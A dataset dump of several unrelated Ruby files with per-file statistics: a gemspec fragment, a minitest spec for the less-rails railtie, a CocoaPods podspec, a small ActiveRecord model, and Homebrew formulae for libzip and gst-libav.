  spec.files      += Dir.glob("lib/**/*.rb")

  # Fix: the fixtures assignment previously clobbered the *.rb spec list;
  # accumulate with += so both sets are packaged.
  spec.test_files  = Dir.glob("spec/**/*.rb")
  spec.test_files += Dir.glob("spec/fixtures/**/*.properties")

  spec.required_rubygems_version = '>= 1.3.5'
end
21bc5de738c2a126c2a2ad242184b9309788d12f | 1,750 | require 'spec_helper'
# Minitest-spec coverage for the less-rails railtie: config plumbing and
# Sprockets registration against the dummy app.
class RailtieSpec < Less::Rails::Spec
  describe 'config' do
    it 'must have a less ordered hash' do
      dummy_config.less.must_be_instance_of ActiveSupport::OrderedOptions
    end
    it 'must have an array for paths' do
      dummy_config.less.paths.must_be_kind_of Array
    end
    # Toggles compress/line_numbers and checks the rendered CSS reflects
    # each setting; reset_caches forces a re-render between toggles.
    it 'must have an options hash passed down to the #to_css method' do
      basic_compressed_match = /#test-variable\{color:#4d926f\}/
      dummy_config.less.compress = true
      dummy_asset('basics').must_match basic_compressed_match
      reset_caches
      dummy_config.less.compress = false
      dummy_asset('basics').wont_match basic_compressed_match
      reset_caches
      dummy_config.less.line_numbers = 'mediaquery'
      dummy_asset('basics').wont_match basic_compressed_match
      basic_sourcemap_match = /@media -sass-debug-info{filename{font-family:file/
      dummy_asset('basics').must_match basic_sourcemap_match
    end
  end
  describe 'initialization' do
    it 'must register our template engine' do
      dummy_assets.engines['.less'].must_be_instance_of Grease::Adapter
    end
    it 'must extend the context class with our config' do
      dummy_assets.context_class.must_respond_to :less_config
      dummy_assets.context_class.less_config.must_equal dummy_config.less
    end
    it 'must register our import pre processor' do
      dummy_assets.preprocessors['text/css'].any? do |preprocessor|
        preprocessor.is_a? Grease::Adapter
      end.must_equal true
    end
    it 'must include the asset pipelines stylesheet paths to less paths' do
      dummy_app.config.less.paths.must_include "#{dummy_app.root}/app/assets/stylesheets"
    end
  end
end
| 31.25 | 89 | 0.713714 |
61d008be658bf0d9112633040388c179ace9a769 | 1,615 | #
# Be sure to run `pod lib lint MyLibrary.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
# CocoaPods spec for the MyLibrary helper pod.
Pod::Spec.new do |s|
  s.name    = 'MyLibrary'
  s.version = '0.1.2'
  s.summary = 'This is a part of app collection helping in color'

  # Long description (placeholder left by the pod template).
  s.description = <<-DESC
TODO: Add long description of the pod here.
                       DESC

  s.homepage = 'https://github.com/arthi-p/MyLibrary.git'
  s.license  = { :type => 'MIT', :file => 'LICENSE' }
  s.author   = { '[email protected]' => '[email protected]' }
  s.source   = { :git => 'https://github.com/arthi-p/MyLibrary.git', :tag => s.version.to_s }

  s.ios.deployment_target = '8.0'
  s.source_files = 'MyLibrary/Classes/**/*'
end
| 37.55814 | 101 | 0.636533 |
4a575526a9a6aba2e25d25d887af3ee0e4505959 | 97 | class ProjectResourceEmail < ActiveRecord::Base
belongs_to :project
belongs_to :resource
end
| 19.4 | 47 | 0.814433 |
1a9da5bee153df3423bc8bd8eaa4263fba60e93c | 1,046 | class Libzip < Formula
desc "C library for reading, creating, and modifying zip archives"
homepage "http://www.nih.at/libzip/"
url "http://www.nih.at/libzip/libzip-0.11.2.tar.gz"
sha256 "83db1fb43a961ff7d1d1b50e1c6bea09c67e6af867686d1fc92ecb7dc6cf98d5"
bottle do
cellar :any
revision 2
sha1 "714257f1e187a42f11c50c8f777d79d8beba28c6" => :yosemite
sha1 "65b31e70e363879aad9f8d1845e17bf7f2dcaeb3" => :mavericks
sha1 "f1571198224aa96ea539e282c24097ee4d9096d6" => :mountain_lion
end
option :universal
def install
ENV.universal_binary if build.universal?
system "./configure", "--prefix=#{prefix}",
"--mandir=#{man}",
"CXX=#{ENV.cxx}",
"CXXFLAGS=#{ENV.cflags}"
system "make", "install"
end
test do
touch "file1"
system "zip", "file1.zip", "file1"
touch "file2"
system "zip", "file2.zip", "file1", "file2"
assert_match /\+.*file2/, shell_output("#{bin}/zipcmp -v file1.zip file2.zip", 1)
end
end
| 30.764706 | 85 | 0.643403 |
d5045781bc52f4ec8cb29f291706236ff7a065fe | 1,318 | class GstLibav < Formula
desc "GStreamer plugins for Libav (a fork of FFmpeg)"
homepage "https://gstreamer.freedesktop.org/"
url "https://gstreamer.freedesktop.org/src/gst-libav/gst-libav-1.18.1.tar.xz"
sha256 "39a717bc2613efbbba19df3cf5cacff0987471fc8281ba2c5dcdeaded79c2ed8"
license "LGPL-2.1-or-later"
revision 1
head "https://anongit.freedesktop.org/git/gstreamer/gst-libav.git"
livecheck do
url "https://gstreamer.freedesktop.org/src/gst-libav/"
regex(/href=.*?gst-libav[._-]v?(\d+\.\d*[02468](?:\.\d+)*)\.t/i)
end
bottle do
cellar :any
sha256 "4fbab8e339a32dff4c432113f6e84608702f384c5c9f22eb74140fd3c3c0205b" => :catalina
sha256 "3e97b626bbdd6c767a8c56e8669a4881e7506f76092776baf1f0f6a830f3b562" => :mojave
sha256 "0d0dacf7c90b1f46e79604b596032ae642c8404f7ee7bfa70df2d6cba2ef2a62" => :high_sierra
end
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "yasm" => :build
depends_on "ffmpeg"
depends_on "gst-plugins-base"
depends_on "xz" # For LZMA
def install
mkdir "build" do
system "meson", *std_meson_args, ".."
system "ninja", "-v"
system "ninja", "install", "-v"
end
end
test do
system "#{Formula["gstreamer"].opt_bin}/gst-inspect-1.0", "libav"
end
end
| 31.380952 | 93 | 0.707132 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.